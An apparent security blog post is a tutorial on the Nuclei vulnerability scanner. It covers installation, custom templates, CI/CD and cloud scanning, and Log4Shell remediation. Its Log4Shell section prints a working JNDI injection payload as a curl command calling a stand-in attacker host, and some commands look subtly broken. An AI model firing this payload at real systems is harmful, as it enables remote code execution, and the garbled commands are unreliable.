Listen to this Post
Introduction:
Nuclei, developed by ProjectDiscovery, is a fast, customizable vulnerability scanner powered by YAML-based templates that enables security professionals to detect thousands of known and zero-day vulnerabilities across web applications, APIs, and cloud infrastructure. The recent Nuclei Nights event in Singapore, held alongside Black Hat Asia and DEF CON Singapore, underscored the growing importance of community-driven open-source security tools, bringing together experts who rely on Nuclei for everything from bug bounties to enterprise red teaming.
Learning Objectives:
- Install and configure Nuclei on both Linux and Windows environments for automated vulnerability scanning.
- Write and debug custom Nuclei templates to detect proprietary application flaws and zero-day vulnerabilities.
- Integrate Nuclei into CI/CD pipelines and cloud hardening workflows for continuous security validation.
You Should Know:
- Installing Nuclei on Linux and Windows – A Step‑by‑Step Guide
Nuclei is written in Go, making it cross‑platform. Below are verified commands for the two most common operating systems.
Linux (Ubuntu/Debian/Kali):
Install Go (if not present) sudo apt update && sudo apt install golang-go -y Download and install Nuclei go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest Add Go binaries to PATH (add to ~/.bashrc or ~/.zshrc) export PATH=$PATH:$(go env GOPATH)/bin source ~/.bashrc Verify installation nuclei -version
Windows (PowerShell as Administrator):
Install Go from official installer (https://go.dev/dl/) first, then: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest Add to PATH (replace with your user) $env:Path += ";$env:USERPROFILE\go\bin" Make permanent: Test nuclei -version
After installation, update the template database (required before first scan):
nuclei -update-templates
This downloads thousands of community and official templates into ~/nuclei-templates.
- Running Your First Nuclei Scan – Basic Command Structure
Nuclei scans targets using template directories. Here’s how to scan a single URL for critical and high‑severity issues.
Command:
nuclei -u https://example.com -severity critical,high -o results.txt
– `-u` : target URL (can also use `-list targets.txt` for multiple)
– `-severity` : filters templates by risk level
– `-o` : saves output to a file
Example with a live test target (OWASP Juice Shop):
nuclei -u http://juice-shop.herokuapp.com -tags tech,exposure -stats -si 5
– `-tags` : runs only templates tagged with “tech” (technology detection) or “exposure”
– `-stats` : shows live scan statistics
– `-si 5` : updates stats every 5 seconds
Windows equivalent – same command, just ensure `nuclei.exe` is in PATH.
To scan a list of subdomains from a file:
nuclei -list subdomains.txt -t ~/nuclei-templates/ -o subdomain_scan.txt
- Creating Custom Nuclei Templates – YAML Anatomy for Zero‑Day Detection
Nuclei’s power lies in its template system. Below is a template to detect a hardcoded API key in a JavaScript file.
Template file: `detect-api-key.yaml`
id: detect-exposed-api-key
info:
name: Exposed Google Maps API Key in JS
author: security_learner
severity: medium
description: Detects plaintext Google Maps API keys in JavaScript responses.
tags: exposure,js,api
requests:
- method: GET
path:
- "{{BaseURL}}/static/js/main.js" adjust path as needed
matchers:
- type: regex
part: body
regex:
- "AIza[0-9A-Za-z\-_]{35}"
condition: or
Run it:
nuclei -u https://target.com -t detect-api-key.yaml
Step‑by‑step to build your own:
- Create a `.yaml` file under a custom folder (e.g.,
my-templates/). - Define `id` (unique) and `info` block with metadata.
- Under
requests, specify HTTP method, path(s), and optional headers. - Add `matchers` (regex, word, status, or DSL) to identify the vulnerability.
- Test locally:
nuclei -u http://test-target -t my-templates/. -
Integrating Nuclei into CI/CD Pipelines & Cloud Hardening
Automate security scanning in GitHub Actions to catch vulnerabilities before merge.
GitHub Actions workflow `.github/workflows/nuclei-scan.yml`:
name: Nuclei Security Scan on: push: branches: [ main ] schedule: - cron: '0 3 1' weekly on Monday at 3 AM jobs: nuclei: runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v4 - name: Setup Nuclei run: | go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest ~/go/bin/nuclei -update-templates - name: Scan staging environment run: | ~/go/bin/nuclei -u https://staging.yourdomain.com -severity critical,high -o nuclei_report.txt - name: Upload report uses: actions/upload-artifact@v3 with: name: nuclei-report path: nuclei_report.txt
Cloud hardening example – scan AWS S3 bucket permissions:
nuclei -target https://myapp.s3.amazonaws.com -tags s3,cloud -severity high
Add custom headers for AWS auth if needed:
nuclei -u https://bucket.s3.amazonaws.com -H "Authorization: Bearer $AWS_TOKEN"
- Advanced Nuclei Techniques: Fuzzing, Rate Limiting & Headless Browsing
To avoid overwhelming a target (or being blocked), use rate limiting and concurrency controls.
Rate‑limited scan:
nuclei -u https://target.com -t ~/nuclei-templates/ -c 25 -rl 100 -bs 512
– `-c 25` : concurrent threads (default 25)
– `-rl 100` : requests per second
– `-bs 512` : bulk size for host deduplication
Fuzzing with Nuclei + headless for JavaScript‑rendered apps:
nuclei -u https://singlepageapp.com -headless -tags xss,idor -timeout 10
The `-headless` flag launches a Chromium instance to execute client‑side JavaScript before matching.
Mitigation tip: If you are defending against Nuclei‑style scanning, implement:
– Rate limiting at the WAF (e.g., `iptables` rate limit or Cloudflare rules)
– Challenge‑based thresholds (CAPTCHA after 50 requests/minute)
– Dynamic token rotation for API endpoints
- Nuclei for API Security and Misconfigured Cloud Services
Nuclei includes a dedicated set of templates for API vulnerabilities (GraphQL, REST, gRPC). Run:
nuclei -u https://api.target.com/v1 -tags api,graphql -t ~/nuclei-templates/
Example – detect exposed Swagger/OpenAPI docs:
nuclei -u https://target.com -tags swagger,exposure -severity medium
Windows PowerShell automation for API scanning:
$targets = Get-Content .\api_endpoints.txt
foreach ($t in $targets) {
nuclei.exe -u $t -tags api -o "scan_$($t -replace '[^a-zA-Z]', '_').txt"
}
Cloud hardening action: Regularly scan your cloud load balancers and storage buckets:
Scan all public buckets of an organization (requires valid AWS CLI config)
aws s3 ls | awk '{print $3}' | while read bucket; do
nuclei -u "https://$bucket.s3.amazonaws.com" -tags s3,bucket -o "s3_$bucket.txt"
done
- Vulnerability Exploitation and Mitigation Based on Nuclei Findings
Once Nuclei reports a finding, you need to validate and remediate. Below is a real‑world example for Log4Shell (CVE-2021-44228).
Detect with Nuclei:
nuclei -u https://vulnerable-app.com -tags log4j -severity critical
Exploitation concept (for authorized testing only):
curl -X POST https://vulnerable-app.com/api -H 'X-API-Version: ${jndi:ldap://attacker.com/exploit}'
This forces the server to fetch a remote LDAP object, leading to RCE.
Mitigation steps for Linux servers:
Remove vulnerable JndiLookup class from log4j-core (if version 2.10-2.14.1) zip -q -d log4j-core-.jar org/apache/logging/log4j/core/lookup/JndiLookup.class Or upgrade to log4j 2.17.0+ sudo apt update && sudo apt install log4j2=2.17.0 Block outgoing LDAP/RMI in iptables sudo iptables -A OUTPUT -p tcp --dport 389 -j DROP sudo iptables -A OUTPUT -p tcp --dport 1099 -j DROP
Windows mitigation:
Remove JndiLookup class from log4j jar jar -xf log4j-core-.jar del org/apache/logging/log4j/core/lookup/JndiLookup.class jar -uf log4j-core-.jar org/ Or set system property set LOG4J_FORMAT_MSG_NO_LOOKUPS=true
What Undercode Say:
- Community‑driven templates are a double‑edged sword – they enable rapid detection of emerging threats but also give attackers insight into detection patterns, forcing defenders to constantly evolve custom rules.
- Integration beats isolation – Nuclei shines when embedded into CI/CD and cloud workflows, shifting security left and catching misconfigurations before production. The event in Singapore highlighted that real collaboration between DEF CON and Black Hat attendees accelerates tooling maturity.
- Automation without context is noise – Running default Nuclei scans generates hundreds of findings; success requires custom template writing, risk scoring, and remediation playbooks like the Log4Shell example above.
Prediction:
As open‑source “community nights” like Nuclei Nights proliferate globally, we will see a rapid convergence between offensive tooling and defensive automation. By 2027, most mid‑size enterprises will run scheduled, custom‑templated Nuclei scans as part of their standard patching cadence, while red teams will focus exclusively on chaining vulnerabilities that Nuclei cannot detect – pushing the industry toward more behavior‑based and AI‑driven detection. The lines between bug bounty, penetration testing, and continuous monitoring will blur entirely.
▶️ Related Video (68% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Https: – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
